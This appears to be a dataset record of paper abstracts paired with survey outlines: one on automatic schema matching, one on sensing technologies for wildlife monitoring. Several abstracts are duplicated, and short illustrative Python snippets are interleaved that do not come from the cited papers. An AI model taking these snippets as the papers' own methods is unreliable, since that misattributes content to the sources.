--- paper_title: Data warehouse scenarios for model management paper_content: Model management is a framework for supporting meta-data related applications where models and mappings are manipulated as first class objects using operations such as Match, Merge, ApplyFunction, and Compose. To demonstrate the approach, we show how to use model management in two scenarios related to loading data warehouses. The case study illustrates the value of model management as a methodology for approaching meta-data related problems. It also helps clarify the required semantics of key operations. These detailed scenarios provide evidence that generic model management is useful and, very likely, implementable. --- paper_title: Issues and approaches of database integration paper_content: In many large companies the widespread usage of computers has led a number of different application-specific databases to be installed. As company structures evolve, boundaries between departments move, creating new business units. Their new applications will use existing data from various data stores, rather than new data entering the organization. Henceforth, the ability to make data stores interoperable becomes a crucial factor for the development of new information systems. Data interoperability may come in various degrees. At the lowest level, commercial gateways connect specific pairs of database management systems (DBMSs). Software providing facilities for defining persistent views over different databases [6] simplifies access to distant data but does not support automatic enforcement of consistency constraints among different databases. Full interoperability is achieved by distributed or federated database systems, which support integration of existing data into virtual databases (i.e. databases which are logically defined but not physically materialized). The latter allow existing databases to remain under control of their respective owners, thus supporting a harmonious coexistence of scalable data integration and site autonomy requirements [9]. Federated systems are very popular today. However, before they become marketable, many issues remain to be solved. Design issues focus on either human-centered aspects (cooperative work, including autonomy issues and negotiation procedures) or database-centered aspects (data integration, schema/database evolution). Operational issues investigate system interoperability mainly in terms of support of new transaction types, new query processing algorithms, security concerns, etc. General overviews may be found elsewhere [4, 9]. This paper is devoted to database integration, possibly the most critical issue. Simply stated, database integration is the process which takes as input a set of databases, and produces as output a single unified description of the input schemas (the integrated schema) and the associated mapping information supporting integrated access to existing data through the integrated schema. As such, database integration is also used in the process of re-engineering an exist i ng l egacy system. Database integration has attracted many diverse and diverging contributions. The purpose, and the main intended contribution of this article is to provide a clear picture of what are the approaches and the current solutions and what remains to be achieved. 
--- paper_title: A comparative analysis of methodologies for database schema integration paper_content: One of the fundamental principles of the database approach is that a database allows a nonredundant, unified representation of all data managed in an organization. This is achieved only when methodologies are available to support integration across organizational and application boundaries. Methodologies for database design usually perform the design activity by separately producing several schemas, representing parts of the application, which are subsequently merged. Database schema integration is the activity of integrating the schemas of existing or proposed databases into a global, unified schema. The aim of the paper is to provide first a unifying framework for the problem of schema integration, then a comparative review of the work done thus far in this area. Such a framework, with the associated analysis of the existing approaches, provides a basis for identifying strengths and weaknesses of individual methodologies, as well as general guidelines for future improvements and extensions. --- paper_title: Federated database systems for managing distributed, heterogeneous, and autonomous databases paper_content: A federated database system (FDBS) is a collection of cooperating database systems that are autonomous and possibly heterogeneous. In this paper, we define a reference architecture for distributed database management systems from system and schema viewpoints and show how various FDBS architectures can be developed. We then define a methodology for developing one of the popular architectures of an FDBS. Finally, we discuss critical issues related to developing and operating an FDBS. --- paper_title: Data warehouse scenarios for model management paper_content: Model management is a framework for supporting meta-data related applications where models and mappings are manipulated as first class objects using operations such as Match, Merge, ApplyFunction, and Compose. To demonstrate the approach, we show how to use model management in two scenarios related to loading data warehouses. The case study illustrates the value of model management as a methodology for approaching meta-data related problems. It also helps clarify the required semantics of key operations. These detailed scenarios provide evidence that generic model management is useful and, very likely, implementable. --- paper_title: Data warehouse scenarios for model management paper_content: Model management is a framework for supporting meta-data related applications where models and mappings are manipulated as first class objects using operations such as Match, Merge, ApplyFunction, and Compose. To demonstrate the approach, we show how to use model management in two scenarios related to loading data warehouses. The case study illustrates the value of model management as a methodology for approaching meta-data related problems. It also helps clarify the required semantics of key operations. These detailed scenarios provide evidence that generic model management is useful and, very likely, implementable. --- paper_title: A theory of attributed equivalence in databases with application to schema integration paper_content: The authors present a common foundation for integrating pairs of entity sets, pairs of relationship sets, and an entity set with a relationship set. This common foundation is based on the basic principle of integrating attributes. 
Any pair of objects whose identifying attributes can be integrated can themselves be integrated. Several definitions of attribute equivalence are presented. These definitions can be used to specify the exact nature of the relationship between a pair of attributes. Based on these definitions, several strategies for attribute integration are presented and evaluated. > --- paper_title: Automated resolution of semantic heterogeneity in multidatabases paper_content: A multidatabase system provides integrated access to heterogeneous, autonomous local databases in a distributed system. An important problem in current multidatabase systems is identification of semantically similar data in different local databases. The Summary Schemas Model (SSM) is proposed as an extension to multidatabase systems to aid in semantic identification. The SSM uses a global data structure to abstract the information available in a multidatabase system. This abstracted form allows users to use their own terms (imprecise queries) when accessing data rather than being forced to use system-specified terms. The system uses the global data structure to match the user's terms to the semantically closest available system terms. A simulation of the SSM is presented to compare imprecise-query processing with corresponding query-processing costs in a standard multidatabase system. The costs and benefits of the SSM are discussed, and future research directions are presented. --- paper_title: A theory of attributed equivalence in databases with application to schema integration paper_content: The authors present a common foundation for integrating pairs of entity sets, pairs of relationship sets, and an entity set with a relationship set. This common foundation is based on the basic principle of integrating attributes. Any pair of objects whose identifying attributes can be integrated can themselves be integrated. Several definitions of attribute equivalence are presented. These definitions can be used to specify the exact nature of the relationship between a pair of attributes. Based on these definitions, several strategies for attribute integration are presented and evaluated. > --- paper_title: SYSTEM/U: a database system based on the universal relation assumption paper_content: System/U is a universal relation database system under development at Standford University which uses the language C on UNIX. The system is intended to test the use of the universal view, in which the entire database is seen as one relation. This paper describes the theory behind System/U, in particular the theory of maximal objects and the connection between a set of attributes. We also describe the implementation of the DDL (Data Description Language) and the DML (Data Manipulation Language), and discuss in detail how the DDL finds maximal objects and how the DML determines the connection between the attributes that appear in a query. --- paper_title: DataGuides : Enabling Query Formulation and Optimization in Semistructured Databases * paper_content: In semistructured databases there is no schema fixed in advance. To provide the benefits of a schema in such environments, we introduce DataGuides: concise and accurate structural summaries of semistructured databases. DataGuides serve as dynamic schemas, generated from the database; they are useful for browsing database structure, formulating queries, storing information such as statistics and sample values, and enabling query optimization. 
This paper presents the theoretical foundations of DataGuides along with an algorithm for their creation and an overview of incremental maintenance. We provide performance results based on our implementation of DataGuides in the Lore DBMS for semistructured data. We also describe the use of DataGuides in Lore, both in the user interface to enable structure browsing and query formulation, and as a means of guiding the query processor and optimizing query execution. --- paper_title: Multifaceted exploitation of metadata for attribute match discovery in information integration paper_content: Automating semantic matching of attributes for the purpose of information integration is challenging, and the dynamics of the Web further exacerbate this problem. Believing that many facets of metadata can contribute to a resolution, we present a framework for multifaceted exploitation of metadata in which we gather information about potential matches from various facets of metadata and combine this information to generate and place confidence values on potential attribute matches. To make the framework apply in the highly dynamic Web environment, we base our process largely on machine learning. Experiments we have conducted are encouraging, showing that when the combination of facets converges as expected, the results are highly reliable. --- paper_title: Experience with a Combined Approach to Attribute-Matching Across Heterogeneous Databases paper_content: Determining attribute correspondences is a difficult, time-consuming, knowledge-intensive part of database integration. We report on experiences with tools that identified candidate correspondences, as a step in a large scale effort to improve communication among Air Force systems. First, we describe a new method that was both simple and surprisingly successful: Data dictionary and catalog information were dumped to unformatted text; then off-the-shelf information retrieval software estimated string similarity, generated candidate matches, and provided the interface. The second method used a different set of clues, such as statistics on database populations, to compute separate similarity metrics (using neural network techniques). We report on substantial use of the first tool, and then report some limited initial experiments that examine the two techniques’ accuracy, consistency and complementarity. --- paper_title: Global viewing of heterogeneous data sources paper_content: The problem of defining global views of heterogeneous data sources to support querying and cooperation activities is becoming more and more important due to the availability of multiple data sources within complex organizations and in global information systems. Global views are defined to provide a unified representation of the information in the different sources by analyzing conceptual schemas associated with them and resolving possible semantic heterogeneity. We propose an affinity based unification method for global view construction. In the method: (1) the concept of affinity is introduced to assess the level of semantic relationship between elements in different schemas by taking into account semantic heterogeneity; (2) schema elements are classified by affinity levels using clustering procedures so that their different representations can be analyzed for unification; (3) global views are constructed starting from selected clusters by unifying representations of their elements. 
Experiences of applying the proposed unification method and the associated tool environment ARTEMIS on databases of the Italian Public Administration information systems are described. --- paper_title: Using Schema Matching to Simplify Heterogeneous Data Translation paper_content: A broad spectrum of data is available on the Web in distinct heterogeneous sources, and stored under different formats. As the number of systems that utilize this heterogeneous data grows, the importance of data translation and conversion mechanisms increases greatly. In this paper we present a new translation system, based on schema-matching, aimed at simplifying the intricate task of data conversion. We observe that in many cases the schema of the data in the source system is very similar to that of the target system. In such cases, much of the translation work can be done automatically, based on the schemas similarity. This saves a lot of effort for the user, limiting the amount of programming needed. We define common schema and data models, in which schemas and data (resp.) from many common models can be represented. Using a rule-based method, the source schema is compared with the target one, and each component in the source schema is matched with a corresponding component in the target schema. Then, based on the matching achieved, data instances of the source schema can be translated to instances of the target schema. We show that our schema-based translation system allows a convenient specification and customization of data conversions, and can be easily combined with the traditional data-based translation languages. --- paper_title: Generic Schema Matching with Cupid paper_content: Schema matching is a critical step in many applications, such as XML message mapping, data warehouse loading, and schema integration. In this paper, we investigate algorithms for generic schema matching, outside of any particular data model or application. We first present a taxonomy for past solutions, showing that a rich range of techniques is available. We then propose a new algorithm, Cupid, that discovers mappings between schema elements based on their names, data types, constraints, and schema structure, using a broader set of techniques than past approaches. Some of our innovations are the integrated use of linguistic and structural matching, context-dependent matching of shared types, and a bias toward leaf structure where much of the schema content resides. After describing our algorithm, we present experimental results that compare Cupid to two other schema matching systems. --- paper_title: The Clio project: managing heterogeneity paper_content: Clio is a system for managing and facilitating the complex tasks of heterogeneous data transformation and integration. In Clio, we have collected together a powerful set of data management techniques that have proven invaluable in tackling these difficult problems. In this paper, we present the underlying themes of our approach and present a brief case study. --- paper_title: Data-driven understanding and refinement of schema mappings paper_content: At the heart of many data-intensive applications is the problem of quickly and accurately transforming data into a new form. Database researchers have long advocated the use of declarative queries for this process. Yet tools for creating, managing and understanding the complex queries necessary for data transformation are still too primitive to permit widespread adoption of this approach. 
We present a new framework that uses data examples as the basis for understanding and refining declarative schema mappings. We identify a small set of intuitive operators for manipulating examples. These operators permit a user to follow and refine an example by walking through a data source. We show that our operators are powerful enough both to identify a large class of schema mappings and to distinguish effectively between alternative schema mappings. These operators permit a user to quickly and intuitively build and refine complex data transformation queries that map one data source into another. --- paper_title: Experience with a Combined Approach to Attribute-Matching Across Heterogeneous Databases paper_content: Determining attribute correspondences is a difficult, time-consuming, knowledge-intensive part of database integration. We report on experiences with tools that identified candidate correspondences, as a step in a large scale effort to improve communication among Air Force systems. First, we describe a new method that was both simple and surprisingly successful: Data dictionary and catalog information were dumped to unformatted text; then off-the-shelf information retrieval software estimated string similarity, generated candidate matches, and provided the interface. The second method used a different set of clues, such as statistics on database populations, to compute separate similarity metrics (using neural network techniques). We report on substantial use of the first tool, and then report some limited initial experiments that examine the two techniques’ accuracy, consistency and complementarity. ---
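Several of the prototypes cited above start from element-level linguistic matching, i.e. scoring how similar two element names are before structural or instance-level evidence is brought in. The sketch below shows one minimal way to do this, blending word-token overlap with character-level similarity and keeping candidates above a fixed threshold; the scoring weights, the threshold and the attribute names are assumptions for illustration, not the actual algorithms of Cupid, Clio or the other systems described above.

from difflib import SequenceMatcher

def name_similarity(a, b):
    """Blend word-token overlap with character-level string similarity."""
    ta = set(a.lower().replace("_", " ").split())
    tb = set(b.lower().replace("_", " ").split())
    token_sim = len(ta & tb) / len(ta | tb) if (ta | tb) else 0.0
    char_sim = SequenceMatcher(None, a.lower(), b.lower()).ratio()
    return 0.5 * token_sim + 0.5 * char_sim

def match_elements(schema_a, schema_b, threshold=0.35):
    """Propose candidate element correspondences whose score clears the threshold."""
    candidates = []
    for a in schema_a:
        for b in schema_b:
            score = name_similarity(a, b)
            if score >= threshold:
                candidates.append((a, b, round(score, 2)))
    return sorted(candidates, key=lambda t: -t[2])

# Hypothetical attribute names, used only to exercise the matcher.
print(match_elements(["cust_name", "cust_address", "phone"],
                     ["CustomerName", "customer address", "telephone"]))

In a composite matcher of the kind surveyed here, scores like these would be combined with constraint-based and instance-level evidence before a mapping is proposed to the user.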
Title: A Survey of Approaches to Automatic Schema Matching Section 1: Introduction Description 1: Provide an overview and motivation for the problem of schema matching, highlighting the need for automated solutions in various application domains. Section 2: Application domains Description 2: Summarize the use of schema matching across different database application domains to emphasize its importance. Section 3: The match operator Description 3: Define the match operator, including its input, output, and how it functions to match schema elements. Section 4: Architecture for generic match Description 4: Describe the high-level architecture for implementing a generic and customizable match operator, detailing the interaction between different components. Section 5: Classification of schema matching approaches Description 5: Provide a taxonomy for the different approaches to schema matching, categorizing them based on various criteria such as schema-level vs. instance-level, element-level vs. structure-level, and linguistic vs. constraint-based approaches. Section 6: Schema-level matchers Description 6: Discuss schema-level matching techniques, including element-level and structure-level matching, linguistic approaches, and constraint-based matchers. Section 7: Instance-level approaches Description 7: Explore instance-level matching techniques that rely on the actual data instances to improve the accuracy of schema matching. Section 8: Combining different matchers Description 8: Explain the methodologies for combining different matchers to enhance the accuracy and effectiveness of schema matching, including hybrid matchers and composite matchers. Section 9: Prototype schema matchers Description 9: Review various prototype implementations of schema matchers, comparing their approaches, strengths, and weaknesses. Section 10: Conclusion Description 10: Summarize the key points covered in the survey and discuss potential future research directions in the field of schema matching.
Sensing Solutions for Collecting Spatio-Temporal Data for Wildlife Monitoring Applications: A Review
18
--- paper_title: Long-term, year-round monitoring of wildlife crossing structures and the importance of temporal and spatial variability in performance studies paper_content: Maintaining landscape connectivity where habitat linkages or animal migrations intersect roads requires some form of mitigation to increase permeability. Wildlife crossing structures are now being designed and incorporated into numerous road construction projects to mitigate the effects of habitat fragmentation. For them to be functional they must promote immigration and population viability. There has been a limited amount of research and information on what constitutes effective structural designs. One reason for the lack of information is because few mitigation programs implemented monitoring programs with sufficient experimental design into pre- and post-construction. Thus, results obtained from most studies remain observational at best. Furthermore, studies that did collect data in more robust manners generally failed to address the need for wildlife habituation to such large-scale landscape change. Such habituation periods can take several years depending on the species as they experience, learn and adjust their own behaviours to the wildlife structures. Also, the brief monitoring periods frequently incorporated are simply insufficient to draw on reliable conclusions. Earlier studies focused primarily on single-species crossing structure relationships, paying limited attention to ecosystem-level phenomena. The results of single species monitoring programs may fail to recognize the barrier effects imposed on other non-target species. Thus, systems can be severely compromised if land managers and transportation planners rely on simple extrapolation species. In a previous analysis of wildlife underpasses in Banff National Park (BNP), Canada, we found human influence consistently ranked high as a significant factor affecting species passage. Our results suggest that the physical dimensions of the underpasses had little effect on passage because animals may have adapted to the 12-year old underpasses. As a sequel to the above study, we examined a completely new set of recently constructed underpasses and overpasses which animals had little time to become familiar with. We investigated the importance of temporal and spatial variability using data obtained from systematic, year-round monitoring of 13 newly-constructed wildlife crossing structures 34 months post-construction. Our results suggest that structural attributes best correlated to performance indices for both large predator and prey species, while landscape and human-related factors were of secondary importance. These findings underscore the importance of integrating temporal and spatial variability as a priori when addressing wildlife crossing structure efficacy, and the fact that species respond differently to crossing structure features. Thus mitigation planning in a multiple-species ecosystem is likely to be a challenging process. The results from this work suggest that mitigation strategies need to be proactive at the site and landscape level to ensure that crossing structures remain functional over time, including human use management. 
Continuous long-term monitoring of crossing structures will be key to ascertaining the strengths and weaknesses of design characteristics for a multi-species assemblage --- paper_title: Spatio-temporal Relationships Among Adult Raccoons (Procyon lotor) in Central Mississippi paper_content: Abstract We monitored 131 (99 male, 32 female) radiocollared raccoons (Procyon lotor) from January 1991 to December 1997 on the Tallahala Wildlife Management Area, Mississippi. We examined inter- and intrasexual spatial relationships and temporal interactions among adults. Adult males frequently maintained overlapping home ranges and core use areas and some males maintained spatial groups that overlapped minimally with adjacent groups or solitary males, suggesting territoriality among groups. Males arranged in spatial groups were often significantly positively associated with each other; however, we observed instances of males who remained solitary and maintained exclusive home ranges and core areas. Adult females maintained exclusive home ranges and core areas during winter, but several females shared home ranges during other seasons. However, these females did not forage or den together and were significantly negatively associated with each other within shared areas, indicating that movements by these i... --- paper_title: An emerging movement ecology paradigm paper_content: Movement of individual organisms, one of the most fundamental features of life on Earth, is a crucial component of almost any ecological and evolutionary process, including major problems associated with habitat fragmentation, climate change, biological invasions, and the spread of pests and diseases. The rich variety of movement modes seen among microorganisms, plants, and animals has fascinated mankind since time immemorial. The prophet Jeremiah (7th century B.C.), for instance, described the temporal consistency in migratory patterns of birds, and Aristotle (4th century B.C.) searched for common features unifying animal movements (see ref. 1). --- paper_title: The interpretation of habitat preference metrics under use–availability designs paper_content: Models of habitat preference are widely used to quantify animal-habitat relationships, to describe and predict differential space use by animals, and to identify habitat that is important to an animal (i.e. that is assumed to influence fitness). Quantifying habitat preference involves the statistical comparison of samples of habitat use and availability. Preference is therefore contingent upon both of these samples. The inferences that can be made from use versus availability designs are influenced by subjectivity in defining what is available to the animal, the problem of quantifying the accessibility of available resources and the framework in which preference is modelled. Here, we describe these issues, document the conditional nature of preference and establish the limits of inferences that can be drawn from these analyses. We argue that preference is not interpretable as reflecting the intrinsic behavioural motivations of the animal, that estimates of preference are not directly comparable among different samples of availability and that preference is not necessarily correlated with the value of habitat to the animal. We also suggest that preference is context-dependent and that functional responses in preference resulting from changing availability are expected. We conclude by describing advances in analytical methods that begin to resolve these issues. 
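To make the use-availability comparison described above concrete, one common estimator (assumed here purely for illustration, not taken from the cited paper) contrasts locations the animal actually used with locations sampled as available to it, using logistic regression; the sign and magnitude of a covariate's coefficient then summarise preference with respect to that covariate. The covariate, sample sizes and distributions below are hypothetical.

import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(1)

# Hypothetical single covariate: distance to cover (km) at locations an animal
# used (GPS fixes) versus locations sampled as available within its range.
used = rng.normal(0.5, 0.3, size=200)
available = rng.normal(1.5, 0.8, size=1000)

X = np.concatenate([used, available]).reshape(-1, 1)
y = np.concatenate([np.ones(used.size), np.zeros(available.size)])

beta = LogisticRegression().fit(X, y).coef_[0, 0]
print(f"estimated selection coefficient for distance to cover: {beta:.2f}")
# A negative coefficient here indicates selection for locations closer to cover
# than expected from availability; as the reference stresses, the estimate is
# conditional on how availability was defined and sampled.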
--- paper_title: Foraging theory upscaled: the behavioural ecology of herbivore movement paper_content: We outline how principles of optimal foraging developed for diet and food patch selection might be applied to movement behaviour expressed over larger spatial and temporal scales. Our focus is on large mammalian herbivores, capable of carrying global positioning system (GPS) collars operating through the seasonal cycle and dependent on vegetation resources that are fixed in space but seasonally variable in availability and nutritional value. The concept of intermittent movement leads to the recognition of distinct movement modes over a hierarchy of spatio-temporal scales. Over larger scales, periods with relatively low displacement may indicate settlement within foraging areas, habitat units or seasonal ranges. Directed movements connect these patches or places used for other activities. Selection is expressed by switches in movement mode and the intensity of utilization by the settlement period relative to the area covered. The type of benefit obtained during settlement periods may be inferred from movement patterns, local environmental features, or the diel activity schedule. Rates of movement indicate changing costs in time and energy over the seasonal cycle, between years and among regions. GPS telemetry potentially enables large-scale movement responses to changing environmental conditions to be linked to population performance. --- paper_title: Behavioral adjustments of African herbivores to predation risk by lions: spatiotemporal variations influence habitat use. paper_content: Predators may influence their prey populations not only through direct lethal effects, but also through indirect behavioral changes. Here, we combined spatiotemporal fine-scale data from GPS radio collars on lions with habitat use information on 11 African herbivores in Hwange National Park (Zimbabwe) to test whether the risk of predation by lions influenced the distribution of herbivores in the landscape. Effects of long-term risk of predation (likelihood of lion presence calculated over four months) and short-term risk of predation (actual presence of lions in the vicinity in the preceding 24 hours) were contrasted. The long-term risk of predation by lions appeared to influence the distributions of all browsers across the landscape, but not of grazers. This result strongly suggests that browsers and grazers, which face different ecological constraints, are influenced at different spatial and temporal scales in the variation of the risk of predation by lions. The results also show that all herbivores tend to use more open habitats preferentially when lions are in their vicinity, probably an effective anti-predator behavior against such an ambush predator. Behaviorally induced effects of lions may therefore contribute significantly to structuring African herbivore communities, and hence possibly their effects on savanna ecosystems. --- paper_title: Stochastic modelling of animal movement paper_content: Modern animal movement modelling derives from two traditions. Lagrangian models, based on random walk behaviour, are useful for multi-step trajectories of single animals. Continuous Eulerian models describe expected behaviour, averaged over stochastic realizations, and are usefully applied to ensembles of individuals. We illustrate three modern research arenas. 
(i) Models of home-range formation describe the process of an animal ‘settling down’, accomplished by including one or more focal points that attract the animal's movements. (ii) Memory-based models are used to predict how accumulated experience translates into biased movement choices, employing reinforced random walk behaviour, with previous visitation increasing or decreasing the probability of repetition. (iii) Levy movement involves a step-length distribution that is over-dispersed, relative to standard probability distributions, and adaptive in exploring new environments or searching for rare targets. Each of these modelling arenas implies more detail in the movement pattern than general models of movement can accommodate, but realistic empiric evaluation of their predictions requires dense locational data, both in time and space, only available with modern GPS telemetry. --- paper_title: A line in the sand: A wireless sensor network for target detection, classification, and tracking paper_content: Intrusion detection is a surveillance problem of practical import that is well suited to wireless sensor networks. In this paper, we study the application of sensor networks to the intrusion detection problem and the related problems of classifying and tracking targets. Our approach is based on a dense, distributed, wireless network of multi-modal resource-poor sensors combined into loosely coherent sensor arrays that perform in situ detection, estimation, compression, and exfiltration. We ground our study in the context of a security scenario called "A Line in the Sand" and accordingly define the target, system, environment, and fault models. Based on the performance requirements of the scenario and the sensing, communication, energy, and computation ability of the sensor network, we explore the design space of sensors, signal processing algorithms, communications, networking, and middleware services. We introduce the influence field, which can be estimated from a network of binary sensors, as the basis for a novel classifier. A contribution of our work is that we do not assume a reliable network; on the contrary, we quantitatively analyze the effects of network unreliability on application performance. Our work includes multiple experimental deployments of over 90 sensor nodes at MacDill Air Force Base in Tampa, FL, as well as other field experiments of comparable scale. Based on these experiences, we identify a set of key lessons and articulate a few of the challenges facing extreme scaling to tens or hundreds of thousands of sensor nodes. --- paper_title: Target classification by echo locating animals paper_content: In this paper, the principal mechanisms by which bats are assumed to classify targets are reviewed. Particular attention is paid to the ways in which bats might extract information from echoes. Classification mechanisms differ fundamentally according to signal design. It is shown how bats design their emitted waveforms according to whether they need to classify on the basis of micro-Doppler or range profile information. Throughout, analogies are made with radar (and sonar) systems, drawing attention to some ways in which engineers might learn from the classification mechanisms proposed for echo locating animals. 
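The movement-model families summarised in the stochastic-modelling reference above are straightforward to simulate. The fragment below draws step lengths from a heavy-tailed (Pareto) distribution with uniformly random headings, i.e. an idealised Levy-style walk of the kind mentioned in arena (iii); the exponent and other parameter values are arbitrary illustrative assumptions.

import math
import random

def levy_walk(n_steps=500, mu=2.0, min_step=1.0, seed=42):
    """Simulate a 2-D walk with Pareto-distributed step lengths (tail exponent mu)
    and uniformly random turning angles."""
    rng = random.Random(seed)
    x, y = 0.0, 0.0
    track = [(x, y)]
    for _ in range(n_steps):
        # Inverse-transform sample from a Pareto(scale=min_step, shape=mu - 1) tail.
        step = min_step * (1.0 - rng.random()) ** (-1.0 / (mu - 1.0))
        heading = rng.uniform(0.0, 2.0 * math.pi)
        x += step * math.cos(heading)
        y += step * math.sin(heading)
        track.append((x, y))
    return track

if __name__ == "__main__":
    path = levy_walk()
    print(f"net displacement after {len(path) - 1} steps: {math.hypot(*path[-1]):.1f}")

Home-range and memory-based variants would add an attraction term toward a focal point, or a bias that depends on previously visited locations, to the heading choice in the same loop.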
--- paper_title: The bird GPS - long-range navigation in migrants paper_content: SUMMARY Nowadays few people consider finding their way in unfamiliar areas a problem as a GPS (Global Positioning System) combined with some simple map software can easily tell you how to get from A to B. Although this opportunity has only become available during the last decade, recent experiments show that long-distance migrating animals had already solved this problem. Even after displacement over thousands of kilometres to previously unknown areas, experienced but not first time migrant birds quickly adjust their course toward their destination, proving the existence of an experience-based GPS in these birds. Determining latitude is a relatively simple task, even for humans, whereas longitude poses much larger problems. Birds and other animals however have found a way to achieve this, although we do not yet know how. Possible ways of determining longitude includes using celestial cues in combination with an internal clock, geomagnetic cues such as magnetic intensity or perhaps even olfactory cues. Presently, there is not enough evidence to rule out any of these, and years of studying birds in a laboratory setting have yielded partly contradictory results. We suggest that a concerted effort, where the study of animals in a natural setting goes hand-in-hand with lab-based study, may be necessary to fully understand the mechanism underlying the long-distance navigation system of birds. As such, researchers must remain receptive to alternative interpretations and bear in mind that animal navigation may not necessarily be similar to the human system, and that we know from many years of investigation of long-distance navigation in birds that at least some birds do have a GPS – but we are uncertain how it works. --- paper_title: Self-contained Position Tracking of Human Movement Using Small Inertial/Magnetic Sensor Modules paper_content: Numerous applications require a self-contained personal navigation system that works in indoor and outdoor environments, does not require any infrastructure support, and is not susceptible to jamming. Posture tracking with an array of inertial/magnetic sensors attached to individual human limb segments has been successfully demonstrated. The "sourceless" nature of this technique makes possible full body posture tracking in an area of unlimited size with no supporting infrastructure. Such sensor modules contain three orthogonally mounted angular rate sensors, three orthogonal linear accelerometers and three orthogonal magnetometers. This paper describes a method for using accelerometer data combined with orientation estimates from the same modules to calculate position during walking and running. The periodic nature of these motions includes short periods of zero foot velocity when the foot is in contact with the ground. This pattern allows for precise drift error correction. Relative position is calculated through double integration of drift corrected accelerometer data. Preliminary experimental results for various types of motion including walking, side stepping, and running document accuracy of distance and position estimates.
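The foot-mounted inertial tracking method described in the last reference above rests on a simple loop: integrate acceleration to velocity and position, and reset the drifting velocity estimate whenever the foot is detected to be stationary on the ground (a zero-velocity update). The one-dimensional sketch below illustrates that loop; the stance-detection rule, the threshold and the synthetic acceleration trace are simplifying assumptions, not the authors' actual algorithm or data.

def zupt_dead_reckoning(accel, dt=0.01, stationary_thresh=0.05):
    """1-D dead reckoning: integrate acceleration to velocity and position, and
    apply a zero-velocity update (ZUPT) whenever |a| falls below a threshold,
    i.e. the foot is assumed to be flat on the ground."""
    v, x = 0.0, 0.0
    positions = []
    for a in accel:
        v += a * dt
        if abs(a) < stationary_thresh:   # crude stance-phase detector
            v = 0.0                      # ZUPT: discard accumulated velocity drift
        x += v * dt
        positions.append(x)
    return positions

# Synthetic gait-like trace: bursts of forward acceleration/deceleration (swing
# phase) separated by near-zero samples (stance phase), plus a small constant
# bias that would otherwise make the velocity estimate drift.
stride = [0.0] * 40 + [2.0] * 10 + [-2.0] * 10 + [0.0] * 40
accel = [a + 0.01 for a in stride * 5]   # 5 strides with a 0.01 m/s^2 bias

print(f"estimated distance walked: {zupt_dead_reckoning(accel)[-1]:.2f} m")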
--- paper_title: A New Application for Transponders in Population Ecology of the Common Tern paper_content: We injected transponders subcutaneously to mark single Common Tern (Sterna hirundo) adults and all chicks of a colony at Wilhelmshaven with the aim of establishing a completely marked colony. We present details on the equipment and methods and report preliminary results. Microtagged terns can be identified for life, not only at their nest when breeding, but also at resting places by fixed antennas at distances of < 11 cm. Thus, nonbreeders can be identified as well. We also weighed terns remotely to obtain information on their body condition. Body mass data as well as identification codes were electronically stored. Preliminary data indicated that adult survival was ≥ 87% and subadult survival until age two was ≥ 20%. --- paper_title: Seismic footstep signal characterization paper_content: Seismic footstep detection based systems for homeland security applications are an important additional layer to perimeter protection and other security systems. This article reports seismic footstep signal characterization for different signal to noise ratios. Various footstep signal spectra are analyzed for different distances between a walking person and a seismic sensor. We also investigated kurtosis of the real footstep signals under various environmental and modeled noises. We also report on the results of seismic signal summation from separate geophones. A seismic signal sum spectrum obtained was broader than that obtained from a single sensor. The peak of the seismic signal sum was broader than that from the footstep signal of the single sensor. The signal and noise spectra have a greater overlap for a seismic signal sum than that from a single sensor. Generally, it is more difficult to filter out the noise from the sum of the seismic signals. We show that the use of the traditional approach of spectrum technology and/or the statistical characteristics of signal to noise of reliable footstep detection systems is not practical. --- paper_title: Tracking Long-Distance Songbird Migration by Using Geolocators paper_content: We mapped migration routes of migratory songbirds to the Neotropics by using light-level geolocators mounted on breeding purple martins (Progne subis) and wood thrushes (Hylocichla mustelina). Wood thrushes from the same breeding population occupied winter territories within a narrow east-west band in Central America, suggesting high connectivity of breeding and wintering populations. Pace of spring migration was rapid (233 to 577 kilometers/day) except for one individual (159 kilometers/day) who took an overland route instead of crossing the Gulf of Mexico. Identifying songbird wintering areas and migration routes is critical for predicting demographic consequences of habitat loss and climate change in tropical regions. --- paper_title: RFID: a technical overview and its application to the enterprise paper_content: Radio frequency identification (RFID) offers tantalizing benefits for supply chain management, inventory control, and many other applications. Only recently, however, has the convergence of lower cost and increased capabilities made businesses take a hard look at what RFID can do for them. This article offers an RFID tutorial that answers the following questions: i) what is RFID, and how does it work? ii) What are some applications of RFID? iii) What are some challenges and problems in RFID technology and implementation?
iv) How have some organizations implemented RFID?. --- paper_title: Wireless sensor devices for animal tracking and control paper_content: This paper describes some new wireless sensor hardware developed for pastoral and environmental applications. From our early experiments with Mote hardware we were inspired to develop our devices with improved radio range, solar power capability, mechanical and electrical robustness, and with unique combinations of sensors. Here we describe the design and evolution of a small family of devices: radio/processor board, a soil moisture sensor interface, and a single board multi-sensor unit for animal tracking experiments. --- paper_title: The design and implementation of a self-calibrating distributed acoustic sensing platform paper_content: We present the design, implementation, and evaluation of the Acoustic Embedded Networked Sensing Box (ENSBox), a platform for prototyping rapid-deployable distributed acoustic sensing systems, particularly distributed source localization. Each ENSBox integrates an ARM processor running Linux and supports key facilities required for source localization: a sensor array, wireless network services, time synchronization, and precise self-calibration of array position and orientation. The ENSBox’s integrated, high precision self-calibration facility sets it apart from other platforms. This self-calibration is precise enough to support acoustic source localization applications in complex, realistic environments: e.g., 5 cm average 2D position error and 1.5 degree average orientation error over a partially obstructed 80x50 m outdoor area. Further, our integration of array orientation into the position estimation algorithm is a novel extension of traditional multilateration techniques. We present the result of several different test deployments, measuring the performance of the system in urban settings, as well as forested, hilly environments with obstructing foliage and 20–30 m distances between neighboring nodes. --- paper_title: Evolution and sustainability of a wildlife monitoring sensor network paper_content: As sensor network technologies become more mature, they are increasingly being applied to a wide variety of applications, ranging from agricultural sensing to cattle, oceanic and volcanic monitoring. Significant efforts have been made in deploying and testing sensor networks resulting in unprecedented sensing capabilities. A key challenge has become how to make these emerging wireless sensor networks more sustainable and easier to maintain over increasingly prolonged deployments. In this paper, we report the findings from a one year deployment of an automated wildlife monitoring system for analyzing the social co-location patterns of European badgers (Meles meles) residing in a dense woodland environment. We describe the stages of its evolution cycle, from implementation, deployment and testing, to various iterations of software optimization, followed by hardware enhancements, which in turn triggered the need for further software optimization. We report preliminary descriptive analyses of a subset of the data collected, demonstrating the significant potential our system has to generate new insights into badger behavior.
